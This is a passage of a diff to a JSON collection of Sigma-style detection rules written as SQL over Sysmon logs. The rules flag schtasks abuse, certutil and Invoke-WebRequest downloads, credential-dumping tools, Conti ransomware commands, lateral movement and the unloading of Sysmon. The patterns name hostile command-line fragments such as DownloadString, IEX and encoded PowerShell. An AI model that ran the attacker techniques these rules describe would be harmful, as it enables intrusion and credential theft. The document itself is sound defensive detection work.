OR Hashes LIKE '%MD5=8EE6802F085F7A9DF7E0303E65722DC0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868%' ESCAPE '\\' OR Hashes LIKE '%SHA256=59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E%' ESCAPE '\\' OR Hashes LIKE '%MD5=F3D4144860CA10BA60F7EF4D176CC736%' ESCAPE '\\' OR Hashes LIKE '%MD5=0EEB1C0133EB4D571178B2D9D14CE3E9%' ESCAPE '\\') OR sha256 IN ('DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC', '54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02', 'D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE', 'FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405', '5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734', 'A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203', 'AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868', '59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983') OR sha1 IN ('480DC408EF50BE69EBCF84B95750F7E93A8A1859', '3B43A5D8B83C637D00D769660D01333E88F5A187', '6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA', 'E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1', '8433A94AEDB6380AC8D4610AF643FB0E5220C5CB', '413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5', 'BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA', 'BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E') OR md5 IN ('BB915073385DD16A846DFA318AFA3C19', '08D79E1FFFA244CC0DC61F7D2036ACA9', '4965EDF659753E3C05D800C6C8A23A7A', '9833A4779B69B38E3E51F04E395674C6', '704DB9184700481A56E5100FB56496CE', '8EE6802F085F7A9DF7E0303E65722DC0', 'F3D4144860CA10BA60F7EF4D176CC736', '0EEB1C0133EB4D571178B2D9D14CE3E9'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_3cx_compromise_execution.yml" + "filename": "proc_creation_win_schtasks_susp_pattern.yml" }, { - "title": "SafeBoot Registry Key Deleted Via Reg.EXE", - "id": "fc0e89b5-adb0-43c1-b749-c12a10ec37de", + "title": "Renamed Mavinject.EXE Execution", + "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products", - "author": "Nasreddine Bencherchali (Nextron Systems), Tim Shelton", + "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((Image LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_delete_safeboot.yml" + "filename": "proc_creation_win_renamed_mavinject.yml" }, { - "title": "PowerShell Base64 Encoded Shellcode", - "id": "2d117e49-e626-4c7c-bd1f-c3c0147774c8", - "status": "stable", - "description": "Detects Base64 encoded Shellcode", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Downloaded From Direct IP Via Certutil.EXE", + "id": "13e6fe51-d478-4c7e-b0f2-6da9b400a829", + "status": "experimental", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.t1027" @@ -6786,18 +6616,18 @@ "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR CommandLine LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_base64_shellcode.yml" + "filename": "proc_creation_win_certutil_download_direct_ip.yml" }, { - "title": "Potential PsExec Remote Execution", - "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", - "status": "experimental", - "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Formbook Process Creation", + "id": "032f5fb3-d959-41a5-9263-4173c802dc2b", + "status": "test", + "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ "attack.resource_development", "attack.t1587.001" @@ -6807,90 +6637,86 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" + "filename": "proc_creation_win_malware_formbook.yml" }, { - "title": "Regsvr32 Anomaly", - "id": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", - "status": "experimental", - "description": "Detects various anomalies in relation to regsvr32.exe", - "author": "Florian Roth (Nextron Systems), oscd.community, Tim Shelton", + "title": "Potential Conti Ransomware Activity", + "id": "689308fc-cfba-4f72-9897-796c1dc61487", + "status": "test", + "description": "Detects a specific command used by the Conti ransomware group", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.010", - "car.2019-04-002", - "car.2019-04-003" + "attack.impact", + "attack.s0575", + "attack.t1486" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%/i:%' ESCAPE '\\' AND CommandLine LIKE '%ftp%' ESCAPE '\\' AND CommandLine LIKE '%scrobj.dll' ESCAPE '\\') OR ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\..\\\\Windows\\\\System32\\\\regsvr32.exe %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\')) OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.bin' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebEx64\\\\Meetings\\\\atucfobj.dll%' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Box\\\\Box\\\\FS\\\\streem.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Box\\\\Box\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/s C:\\\\Windows\\\\System32\\\\RpcProxy\\\\RpcProxy.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" ], - "filename": "proc_creation_win_regsvr32_anomalies.yml" + "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" }, { - "title": "HackTool - LocalPotato Execution", - "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", + "title": "HackTool - Quarks PwDump Execution", + "id": "0685b176-c816-4837-8e7b-1216f346636b", "status": "experimental", - "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", + "description": "Detects usage of the Quarks PwDump tool via commandline arguments", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "cve.2023.21746" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\QuarksPwDump.exe' ESCAPE '\\' OR CommandLine IN (' -dhl', ' --dump-hash-local', ' -dhdc', ' --dump-hash-domain-cached', ' --dump-bitlocker', ' -dhd ', ' --dump-hash-domain ', '--ntds-file')))" ], - "filename": "proc_creation_win_hktl_localpotato.yml" + "filename": "proc_creation_win_hktl_quarks_pwdump.yml" }, { - "title": "Renamed Sysinternals Sdelete Execution", - "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", - "status": "experimental", - "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution via CL_Invocation.ps1", + "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", + "status": "test", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.impact", - "attack.t1485" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "System administrator usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + "filename": "proc_creation_win_lolbin_cl_invocation.yml" }, { - "title": "Suspicious Elevated System Shell", - "id": "178e615d-e666-498b-9630-9ed363038101", + "title": "Suspicious Invoke-WebRequest Execution", + "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", "status": "experimental", - "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", - "author": "frack113, Tim Shelton (update fp)", + "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND LogonId = '0x3e7')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentImage LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_elevated_system_shell.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" }, { "title": "Suspicious Child Process Created as System", @@ -6912,581 +6738,540 @@ "filename": "proc_creation_win_susp_child_process_as_system_.yml" }, { - "title": "PUA - DefenderCheck Execution", - "id": "f0ca6c24-3225-47d5-b1f5-352bf07ecfa7", - "status": "experimental", - "description": "Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion.", - "author": "Florian Roth (Nextron Systems)", + "title": "PUA - NirCmd Execution As LOCAL SYSTEM", + "id": "d9047477-0359-48c9-b8c7-792cedcdc9c4", + "status": "test", + "description": "Detects the use of NirCmd tool for command execution as SYSTEM user", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.005" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unlikely" + "Legitimate use by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DefenderCheck.exe' ESCAPE '\\' OR Description = 'DefenderCheck'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% runassystem %' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_defendercheck.yml" + "filename": "proc_creation_win_pua_nircmd_as_system.yml" }, { - "title": "Suspicious Scheduled Task Creation Involving Temp Folder", - "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "title": "Renamed PAExec Execution", + "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", "status": "test", - "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of renamed version of PAExec. Often used by attackers", + "author": "Florian Roth (Nextron Systems), Jason Lynch", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Administrative activity", - "Software installation" + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\paexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" + "filename": "proc_creation_win_renamed_paexec.yml" }, { - "title": "Potential APT10 Cloud Hopper Activity", - "id": "966e4016-627f-44f7-8341-f394905c361f", + "title": "Sysmon Driver Unloaded Via Fltmc.EXE", + "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", "status": "test", - "description": "Detects potential process and execution activity related to APT10 Cloud Hopper operation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.execution", - "attack.g0045", - "attack.t1059.005" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%.vbs /shell %' ESCAPE '\\') OR (CommandLine LIKE '%csvde -f C:\\\\windows\\\\web\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.log%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_apt10_cloud_hopper.yml" + "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" }, { - "title": "Suspicious Windows App Activity", - "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", - "status": "experimental", - "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "MMC20 Lateral Movement", + "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", + "status": "test", + "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1021.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((Image LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_appx_execution.yml" + "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" }, { - "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", - "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", + "title": "Potential Credential Dumping Via LSASS Process Clone", + "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", "status": "test", - "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging 